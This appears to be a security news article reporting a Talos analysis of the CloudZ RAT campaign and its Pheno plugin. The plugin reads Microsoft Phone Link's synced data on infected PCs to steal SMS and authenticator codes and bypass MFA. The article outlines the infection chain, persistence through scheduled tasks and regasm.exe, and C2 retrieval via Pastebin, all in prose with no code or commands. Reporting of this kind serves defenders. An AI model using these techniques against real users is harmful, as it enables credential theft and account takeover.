Cybersecurity researchers at Cisco Talos have uncovered a sophisticated intrusion campaign that has been active since at least January 2026. Unknown threat actors are deploying a new remote access tool called CloudZ RAT, along with a previously undocumented plugin named Pheno. The campaign’s primary goal is to silently harvest victims’ credentials and intercept multi-factor authentication codes, specifically one-time passwords (OTPs). Instead of trying to infect a mobile device directly, the attackers have devised a clever workaround by targeting the bridge between a user’s computer and their smartphone.

The Phone Link Vulnerability: A New Attack Vector

What makes this campaign particularly insidious is its abuse of Microsoft’s Phone Link application. This built-in Windows tool mirrors a smartphone’s notifications and messages onto a PC screen via Bluetooth and Wi-Fi. Because Phone Link synchronizes data such as SMS messages, call logs, and application notifications to a local SQLite database on the computer, the attackers do not need to deploy mobile malware at all. Once the PC is compromised, the custom Pheno plugin continuously monitors for active Phone Link processes; if it detects an active connection, the attackers can intercept the local database files to read incoming SMS and authenticator app notifications in real time. It’s a bit like picking the lock on a secure vault by stealing the key from the guard’s lunchbox instead of cracking the vault itself.

Attack Chain: From Fake Updates to Full Control

The attack chain begins when a victim is tricked into running a fake ScreenConnect application update, often disguised as a file named systemupdates.exe. This malicious file acts as an initial dropper, deploying a Rust-compiled loader onto the system. To establish a permanent foothold, the dropper executes a hidden PowerShell script that creates a scheduled task on the Windows machine. This task ensures the malware runs whenever the system starts by using a legitimate Windows registration tool called regasm.exe to silently execute an intermediate .NET loader without raising immediate suspicion. Once the environment is deemed safe, the loader deploys the modular CloudZ RAT directly into the system’s memory to avoid antivirus detection. Imagine a burglar who convinces a security guard to let them inside by pretending to be a repairman, then hides in the building’s ventilation shafts until nightfall.

Persistence and Evasion Tactics

CloudZ connects to its command-and-control (C2) server by retrieving secondary configuration data hosted on attacker-controlled Pastebin accounts using the handler name HELLOHIALL. To blend in with normal network traffic, the malware rotates through standard web browser user-agent strings, essentially dressing up as a regular Chrome or Firefox session. According to Talos Intelligence research, the most critical module deployed by CloudZ is the Pheno plugin, which is downloaded using a three-step fallback approach that sequentially tries command-line tools such as curl, PowerShell, or bitsadmin to ensure a successful installation. If one method fails, the attackers simply try the next one, like a persistent telemarketer who keeps calling until someone picks up.

How Pheno Exploits Phone Link’s Synchronization

Once active, Pheno conducts reconnaissance on the victim’s Phone Link application by searching for running processes containing keywords such as PhoneExperienceHost. It specifically looks for local proxy connections that indicate traffic is actively routing between the PC and the phone. By confirming this active relay channel, Pheno flags the system as maybe connected, enabling the attackers to systematically harvest sensitive OTPs and bypass multi-factor authentication protections entirely from the compromised computer. This means that even if users have enabled two-factor authentication on their accounts, the attackers can intercept the verification codes sent via SMS or authenticator apps before the user even sees them. It’s a chilling reminder that MFA is not a silver bullet when an attacker controls the device that receives those codes.

The campaign’s clever use of Phone Link highlights a growing trend in cyberattacks: rather than fighting against security mechanisms head-on, threat actors are finding ways to exploit the features designed to make our lives easier. The attackers aren’t breaking into phones; they’re simply reading the synchronized data on a PC that they already own. For organizations relying heavily on MFA, this serves as a stark wakeup call. The attackers have effectively turned a productivity tool into a surveillance device, and they’re doing it without any mobile malware whatsoever.

As cyber defenders continue to emphasize the importance of multi-factor authentication, attackers are evolving their techniques to circumvent it. This campaign shows that MFA codes are only as secure as the device that receives them. If your PC is compromised, your phone’s notifications might as well be posted on a billboard. Looking ahead, we should expect more attacks that abuse synchronization features between devices. The very bridges we build for convenience can become highways for attackers, and the security industry needs to start gatekeeping those routes with the same rigor as the endpoints themselves.